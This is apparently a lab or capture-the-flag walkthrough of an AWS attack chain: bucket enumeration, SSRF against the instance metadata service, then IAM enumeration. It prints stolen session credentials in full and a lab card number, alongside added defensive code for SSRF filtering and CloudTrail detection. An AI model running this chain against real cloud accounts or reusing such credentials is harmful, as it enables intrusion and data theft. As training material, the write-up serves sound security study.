AWS Cloud Red Teaming done

1. Full URL of the S3 bucket that belongs to the “cwl-metatech” organization?

Tool: cloud_enum
https://github.com/initstring/cloud_enum
---
┌──(kali㉿kali)-[/tmp/cloud_enum]
└─$ python cloud_enum.py -k cwl-metatech --disable-azure --disable-gcp

##########################
        cloud_enum
   github.com/initstring
##########################


Keywords:    cwl-metatech
Mutations:   /tmp/cloud_enum/enum_tools/fuzz.txt
Brute-list:  /tmp/cloud_enum/enum_tools/fuzz.txt

[+] Mutations list imported: 306 items
[+] Mutated results: 1837 items

++++++++++++++++++++++++++
      amazon checks
++++++++++++++++++++++++++

[+] Checking for S3 buckets
  OPEN S3 BUCKET: http://cwl-metatech.s3.amazonaws.com/
      FILES:
      ->http://cwl-metatech.s3.amazonaws.com/cwl-metatech
      ->http://cwl-metatech.s3.amazonaws.com/dev-server-ip.txt
      ->http://cwl-metatech.s3.amazonaws.com/prod-data.txt
      ->http://cwl-metatech.s3.amazonaws.com/staging-data.txt

 Elapsed time: 00:01:48

[+] Checking for AWS Apps
[*] Brute-forcing a list of 1837 possible DNS names

 Elapsed time: 00:00:30


[+] All done, happy hacking!

Answer

http://cwl-metatech.s3.amazonaws.com

2. A web app is running on the “dev-server” EC2 instance. What is the name of the parameter that is vulnerable to SSRF?

Open the website: http://18.216.126.203/update.html (IP address from here --> http://cwl-metatech.s3.amazonaws.com/dev-server-ip.txt)
---
┌──(kali㉿kali)-[/tmp/cloud_enum]
└─$ curl -s http://cwl-metatech.s3.amazonaws.com/dev-server-ip.txt       
18.216.126.203  
---
Find the SSRF vulnerability in the ip parameter

Answer

ip

3. Name of role attached to the dev ec2 instance?

Read metadata

payload: http://169.254.169.254/latest/meta-data/iam/security-credentials

Answer

ec2-role
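
The metadata request above succeeds because the server fetches whatever URL arrives in the ip parameter. The check below is an added example, not code from the lab or its web app: a hypothetical `is_safe_target()` helper that a fetch handler could call first, with an injectable `resolver` argument (an assumption) so it can run offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Ranges a server-side fetcher must never reach on a user's behalf.
BLOCKED_NETS = [ipaddress.ip_network(n) for n in (
    "169.254.0.0/16",                      # link-local, holds the metadata service
    "127.0.0.0/8", "0.0.0.0/8",            # loopback and "this host"
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",  # private ranges
    "::1/128", "fe80::/10", "fc00::/7",    # IPv6 loopback, link-local, ULA
)]

def _dns(host):
    """Default resolver: every address the name currently resolves to."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})

def _addresses(host, resolver):
    """All IPs a host string can denote: literal forms first, then DNS."""
    try:
        return [ipaddress.ip_address(host)]
    except ValueError:
        pass
    try:
        # inet_aton also parses legacy forms such as 2852039166 or 0xa9fea9fe
        return [ipaddress.ip_address(socket.inet_aton(host))]
    except OSError:
        return [ipaddress.ip_address(a) for a in resolver(host)]

def is_safe_target(value, resolver=_dns):
    """True only if every address behind `value` is outside BLOCKED_NETS."""
    try:
        parts = urlsplit(value if "://" in value else "http://" + value)
        if parts.scheme not in ("http", "https") or not parts.hostname:
            return False
        addrs = _addresses(parts.hostname, resolver)
    except (OSError, ValueError):
        return False                       # unresolvable or malformed: refuse
    for ip in addrs:
        ip = getattr(ip, "ipv4_mapped", None) or ip   # unwrap ::ffff:a.b.c.d
        if any(ip in net for net in BLOCKED_NETS):
            return False
    return bool(addrs)
```

The fetch has to connect to the address that was validated and must not follow redirects, otherwise a second DNS answer or a 30x response bypasses the check. Requiring IMDSv2 on the instance is the complementary control, since a plain GET like the payload above then no longer returns credentials.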

4. Name of the user who is part of the “interns” group.

1 Get credentials

Payload: http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2-role
---

{ "Code" : "Success", "LastUpdated" : "2025-01-14T11:50:54Z", "Type" : "AWS-HMAC", "AccessKeyId" : "ASIAUI7PQBNF46UQBZQV", "SecretAccessKey" : "HPa+Y1v5EaiXQ7/odbCbQIzh7la7qjHgbS/nWvJo", "Token" : "IQoJb3JpZ2luX2VjEBwaCXVzLWVhc3QtMiJHMEUCIQCyX32D7mbxeX9ULh1svR0q1h8m8/972J0olI/ejI1PNAIgd7jjeEH6t+oN7N+SfMbI2FkD5XSRKQL4pymTjLOBiIEquQUIFRACGgwyOTQxNzA2NTk2NTkiDFv2z0+kUKSCshvy3CqWBaFqQc1EVpVowoKBzRYkuo05U4kLI+uQGVwTjMt976WpxSrLC97QqSLkYRkMrp/a3KaZ18TfEJB7ewiHnpIxstH3dINGBuN7i5GXQcxc4cGf2vvnBrqgPpms8/ft3HkG2ulshzFsaqubzcVjcdL+pyn2s4JT/f1BmKpeqdip+U7JJE6ZlMoYqHa8WZ90flHBnTacQ3M5+yXzhLmK00acd5Syg1W/IFNe/frV51ye7XE7m9U+ds5tb9Fh508JdfzA97mFU0uRtwf5n9nu/5OKpmyLQpisd6rW9UgVz2sOL+aTwdIH+YYwycd2zPK+XsEeAX/jaUregxAmmFOfZRUAxr6m4PwVoanB0hQYtpWYdQ7NpvZWLytet1fH2bYNhwLioAwiMy88tdSYNig2slMJT2eRhgC7q5/Bob3apJJq+HLDzrw05tL9vc7ebscoZS0AE2aa2a0CXl1JbahBenncPWvUoXnFJC00uwkj7uGrnJR0UeerTQEF2IhoNgZjhOrO5MsLqVmeEVPzjHVxHiXbA0KOaXeQMqXpPHZvIKIMtCJxT6igQ1tQF2YCpJzW1s9Y6pTiFZvIccoKhfjvidVDvDvnGg4O69Rjz/a1XyphF5rvkXq9uLrkE+l/aACLW4XZESOvZQQFWb8i6nPEyQyMyUWn5TIkxq8FE73Z90jaFWdP8KsDRIocDNwuPPk7nmfWlcJUTuY6AX9P9QbN6h8B00cT0hxyI4tnLgdmgKAwRTBEa3GYVhXstwZLKDu7vOp8arvOynxZ56MB2NpZcBPv9Jh+0StPJqS+9ltTYb3qrvStaP4O7MWrpkJchyuHY/MNT+xdUt3K3WdSuS2R5LKGvS3y+++ah6IQblynpWzIPOm6BwC4KIFQMLSfmbwGOrEB40k0GxsCEDFOHu7tJ3yOzzNPJLq5Et5n0mG6Eke8WaQmXFZPmPfSYP+X8cfcJWtFffhz7Xci3bAY0LixgVO8hWed/YFIxgIxt5bMyfL3k14oCrLSEBBKMmmEkuYCSvYjFLLV2T69XaRgfyBQ2t9mRn8gs4TFpwjL2wn2DmERJo3KIjhh4NLZ4Z6Bh6UOSTDxDdi/CyxEwF/x+mDBJ/PqDqv0IDzhWR9dFCvSkCGiRUdO", "Expiration" : "2025-01-14T18:13:53Z" }
---
2 Set up the credentials with the aws configure command

┌──(kali㉿kali)-[/tmp/cloud_enum]
└─$ cat ~/.aws/credentials
[default]
aws_access_key_id = ASIAUI7PQBNF46UQBZQV
aws_secret_access_key = HPa+Y1v5EaiXQ7/odbCbQIzh7la7qjHgbS/nWvJo
aws_token = IQoJb3JpZ2luX2VjEBwaCXVzLWVhc3QtMiJHMEUCIQCyX32D7mbxeX9ULh1svR0q1h8m8/972J0olI/ejI1PNAIgd7jjeEH6t+oN7N+SfMbI2FkD5XSRKQL4pymTjLOBiIEquQUIFRACGgwyOTQxNzA2NTk2NTkiDFv2z0+kUKSCshvy3CqWBaFqQc1EVpVowoKBzRYkuo05U4kLI+uQGVwTjMt976WpxSrLC97QqSLkYRkMrp/a3KaZ18TfEJB7ewiHnpIxstH3dINGBuN7i5GXQcxc4cGf2vvnBrqgPpms8/ft3HkG2ulshzFsaqubzcVjcdL+pyn2s4JT/f1BmKpeqdip+U7JJE6ZlMoYqHa8WZ90flHBnTacQ3M5+yXzhLmK00acd5Syg1W/IFNe/frV51ye7XE7m9U+ds5tb9Fh508JdfzA97mFU0uRtwf5n9nu/5OKpmyLQpisd6rW9UgVz2sOL+aTwdIH+YYwycd2zPK+XsEeAX/jaUregxAmmFOfZRUAxr6m4PwVoanB0hQYtpWYdQ7NpvZWLytet1fH2bYNhwLioAwiMy88tdSYNig2slMJT2eRhgC7q5/Bob3apJJq+HLDzrw05tL9vc7ebscoZS0AE2aa2a0CXl1JbahBenncPWvUoXnFJC00uwkj7uGrnJR0UeerTQEF2IhoNgZjhOrO5MsLqVmeEVPzjHVxHiXbA0KOaXeQMqXpPHZvIKIMtCJxT6igQ1tQF2YCpJzW1s9Y6pTiFZvIccoKhfjvidVDvDvnGg4O69Rjz/a1XyphF5rvkXq9uLrkE+l/aACLW4XZESOvZQQFWb8i6nPEyQyMyUWn5TIkxq8FE73Z90jaFWdP8KsDRIocDNwuPPk7nmfWlcJUTuY6AX9P9QbN6h8B00cT0hxyI4tnLgdmgKAwRTBEa3GYVhXstwZLKDu7vOp8arvOynxZ56MB2NpZcBPv9Jh+0StPJqS+9ltTYb3qrvStaP4O7MWrpkJchyuHY/MNT+xdUt3K3WdSuS2R5LKGvS3y+++ah6IQblynpWzIPOm6BwC4KIFQMLSfmbwGOrEB40k0GxsCEDFOHu7tJ3yOzzNPJLq5Et5n0mG6Eke8WaQmXFZPmPfSYP+X8cfcJWtFffhz7Xci3bAY0LixgVO8hWed/YFIxgIxt5bMyfL3k14oCrLSEBBKMmmEkuYCSvYjFLLV2T69XaRgfyBQ2t9mRn8gs4TFpwjL2wn2DmERJo3KIjhh4NLZ4Z6Bh6UOSTDxDdi/CyxEwF/x+mDBJ/PqDqv0IDzhWR9dFCvSkCGiRUdO
aws_session_token = IQoJb3JpZ2luX2VjEBwaCXVzLWVhc3QtMiJHMEUCIQCyX32D7mbxeX9ULh1svR0q1h8m8/972J0olI/ejI1PNAIgd7jjeEH6t+oN7N+SfMbI2FkD5XSRKQL4pymTjLOBiIEquQUIFRACGgwyOTQxNzA2NTk2NTkiDFv2z0+kUKSCshvy3CqWBaFqQc1EVpVowoKBzRYkuo05U4kLI+uQGVwTjMt976WpxSrLC97QqSLkYRkMrp/a3KaZ18TfEJB7ewiHnpIxstH3dINGBuN7i5GXQcxc4cGf2vvnBrqgPpms8/ft3HkG2ulshzFsaqubzcVjcdL+pyn2s4JT/f1BmKpeqdip+U7JJE6ZlMoYqHa8WZ90flHBnTacQ3M5+yXzhLmK00acd5Syg1W/IFNe/frV51ye7XE7m9U+ds5tb9Fh508JdfzA97mFU0uRtwf5n9nu/5OKpmyLQpisd6rW9UgVz2sOL+aTwdIH+YYwycd2zPK+XsEeAX/jaUregxAmmFOfZRUAxr6m4PwVoanB0hQYtpWYdQ7NpvZWLytet1fH2bYNhwLioAwiMy88tdSYNig2slMJT2eRhgC7q5/Bob3apJJq+HLDzrw05tL9vc7ebscoZS0AE2aa2a0CXl1JbahBenncPWvUoXnFJC00uwkj7uGrnJR0UeerTQEF2IhoNgZjhOrO5MsLqVmeEVPzjHVxHiXbA0KOaXeQMqXpPHZvIKIMtCJxT6igQ1tQF2YCpJzW1s9Y6pTiFZvIccoKhfjvidVDvDvnGg4O69Rjz/a1XyphF5rvkXq9uLrkE+l/aACLW4XZESOvZQQFWb8i6nPEyQyMyUWn5TIkxq8FE73Z90jaFWdP8KsDRIocDNwuPPk7nmfWlcJUTuY6AX9P9QbN6h8B00cT0hxyI4tnLgdmgKAwRTBEa3GYVhXstwZLKDu7vOp8arvOynxZ56MB2NpZcBPv9Jh+0StPJqS+9ltTYb3qrvStaP4O7MWrpkJchyuHY/MNT+xdUt3K3WdSuS2R5LKGvS3y+++ah6IQblynpWzIPOm6BwC4KIFQMLSfmbwGOrEB40k0GxsCEDFOHu7tJ3yOzzNPJLq5Et5n0mG6Eke8WaQmXFZPmPfSYP+X8cfcJWtFffhz7Xci3bAY0LixgVO8hWed/YFIxgIxt5bMyfL3k14oCrLSEBBKMmmEkuYCSvYjFLLV2T69XaRgfyBQ2t9mRn8gs4TFpwjL2wn2DmERJo3KIjhh4NLZ4Z6Bh6UOSTDxDdi/CyxEwF/x+mDBJ/PqDqv0IDzhWR9dFCvSkCGiRUdO
---
3 Run the command to list all users in the interns group

┌──(kali㉿kali)-[/tmp/cloud_enum]
└─$ aws iam get-group --group-name interns --query "Users[*].UserName" --output text
int001

Answer

int001
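
From the defender's side, the steps above leave a clear trace: the instance role's temporary credentials call IAM from an address that is not the instance. The following detection is an added example, not part of the original walkthrough; the CloudTrail records are constructed, and the account ID, instance ID, private address and `INSTANCE_IPS` inventory are assumptions.

```python
import ipaddress
import json

# Constructed CloudTrail records (not from the lab). Only the role name and
# the dev-server public IP come from the walkthrough.
SESSION = "arn:aws:sts::111122223333:assumed-role/ec2-role/i-0123456789abcdef0"
SAMPLE = json.loads("""[
 {"eventSource": "s3.amazonaws.com", "eventName": "GetObject",
  "sourceIPAddress": "18.216.126.203",
  "userIdentity": {"type": "AssumedRole", "arn": "%(s)s"}},
 {"eventSource": "iam.amazonaws.com", "eventName": "GetGroup",
  "sourceIPAddress": "198.51.100.23",
  "userIdentity": {"type": "AssumedRole", "arn": "%(s)s"}},
 {"eventSource": "sts.amazonaws.com", "eventName": "AssumeRole",
  "sourceIPAddress": "ec2.amazonaws.com",
  "userIdentity": {"type": "AWSService", "invokedBy": "ec2.amazonaws.com"}}
]""" % {"s": SESSION})

# Assumed inventory: addresses each instance legitimately calls AWS from.
INSTANCE_IPS = {"i-0123456789abcdef0": {"18.216.126.203", "172.31.5.10"}}

def off_instance_use(records, instance_ips):
    """Return calls made with an instance-role session from a foreign address."""
    findings = []
    for rec in records:
        ident = rec.get("userIdentity", {})
        if ident.get("type") != "AssumedRole":
            continue
        # arn:aws:sts::<account>:assumed-role/<role>/<session name>
        tail = ident.get("arn", "").partition(":assumed-role/")[2]
        role, _, session = tail.partition("/")
        if not session.startswith("i-"):
            continue          # EC2 role sessions are named after the instance ID
        src = rec.get("sourceIPAddress", "")
        try:
            ipaddress.ip_address(src)
        except ValueError:
            continue          # AWS service name instead of an IP address
        if src not in instance_ips.get(session, set()):
            findings.append((role, session, src,
                             rec["eventSource"], rec["eventName"]))
    return findings
```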

5. Name of the group with an “emp003” user as a member.

┌──(kali㉿kali)-[/tmp/cloud_enum]
└─$ aws iam list-groups-for-user --user-name emp003 --query "Groups[*].GroupName" --output text
employees

Answer

employees

6. AWS Account ID which can assume “crossaccount-role”?

┌──(kali㉿kali)-[/tmp/cloud_enum]
└─$ aws iam get-role --role-name crossaccount-role --query "Role.AssumeRolePolicyDocument.Statement[*].Principal.AWS" --output text
arn:aws:iam::999909936336:user/DevOps

Answer

999909936336

7. Name of the AWS role which can be assumed by “devops-role”?

┌──(kali㉿kali)-[/tmp/cloud_enum]
└─$ aws iam list-roles | grep "RoleName.*dev.*"
            "RoleName": "dev-ec2-role-ch1",
            "RoleName": "dev-role",
            "RoleName": "devops-role",

Answer

dev-role
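
The grep above only lists role names; which role devops-role can assume is decided by each role's trust policy, the same AssumeRolePolicyDocument queried in question 6. The following is an added example, not part of the original walkthrough, that reads trust policies from `aws iam list-roles` style output; the sample data is constructed and account 111122223333 is a placeholder.

```python
import json

# Constructed sample shaped like `aws iam list-roles` output. Role names are
# from the walkthrough; trust policies and account 111122223333 are assumed,
# except the crossaccount-role principal shown in question 6.
ROLES = json.loads("""{"Roles": [
 {"RoleName": "dev-ec2-role-ch1", "AssumeRolePolicyDocument": {"Statement": [
   {"Effect": "Allow", "Action": "sts:AssumeRole",
    "Principal": {"Service": "ec2.amazonaws.com"}}]}},
 {"RoleName": "dev-role", "AssumeRolePolicyDocument": {"Statement": [
   {"Effect": "Allow", "Action": "sts:AssumeRole",
    "Principal": {"AWS": ["arn:aws:iam::111122223333:role/devops-role"]}}]}},
 {"RoleName": "devops-role", "AssumeRolePolicyDocument": {"Statement": [
   {"Effect": "Allow", "Action": "sts:AssumeRole",
    "Principal": {"Service": "ec2.amazonaws.com"}}]}},
 {"RoleName": "crossaccount-role", "AssumeRolePolicyDocument": {"Statement": [
   {"Effect": "Allow", "Action": ["sts:AssumeRole"],
    "Principal": {"AWS": "arn:aws:iam::999909936336:user/DevOps"}}]}}
]}""")["Roles"]

def _as_list(value):
    return value if isinstance(value, list) else [value]

def trusted_principals(role):
    """AWS principals that Allow statements let call sts:AssumeRole."""
    found = set()
    for st in _as_list(role["AssumeRolePolicyDocument"]["Statement"]):
        actions = set(_as_list(st.get("Action", [])))
        if st.get("Effect") != "Allow" or not actions & {"sts:AssumeRole", "sts:*", "*"}:
            continue
        principal = st.get("Principal", {})
        # "*" may appear bare or as {"AWS": "*"}; both mean any principal
        found.update(["*"] if principal == "*" else _as_list(principal.get("AWS", [])))
    return found

def roles_assumable_by(roles, principal_arn):
    """Roles whose trust policy names the principal, its account, or anyone."""
    account = principal_arn.split(":")[4]
    # Trusting the account (root ARN or bare ID) delegates the decision to
    # that account's own IAM policies. Condition blocks are not evaluated here.
    matches = {principal_arn, account, f"arn:aws:iam::{account}:root", "*"}
    return sorted(r["RoleName"] for r in roles if trusted_principals(r) & matches)
```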

8. Name of the inline policy embedded in the “emp001” user.

┌──(kali㉿kali)-[/tmp/cloud_enum]
└─$ aws iam list-user-policies --user-name emp001 --output text
POLICYNAMES     s3-administrator-Policy

Answer

s3-administrator-Policy

9. ARN of policy attached to “employees” group?

┌──(kali㉿kali)-[/tmp/cloud_enum]
└─$ aws iam list-attached-group-policies --group-name employees --query "AttachedPolicies[*].PolicyArn" --output text 
arn:aws:iam::aws:policy/AmazonDevOpsGuruFullAccess

Answer

arn:aws:iam::aws:policy/AmazonDevOpsGuruFullAccess

10. The credit card number of “Bob” is in the “prod-data.txt” file stored in the s3 bucket.

┌──(kali㉿kali)-[/tmp/cloud_enum]
└─$ curl -s http://cwl-metatech.s3.amazonaws.com/prod-data.txt | grep Bob
Bob         Cabal1         6271701225979642     03/2026     

Answer

6271701225979642

References

[cloud_enum](https://github.com/initstring/cloud_enum)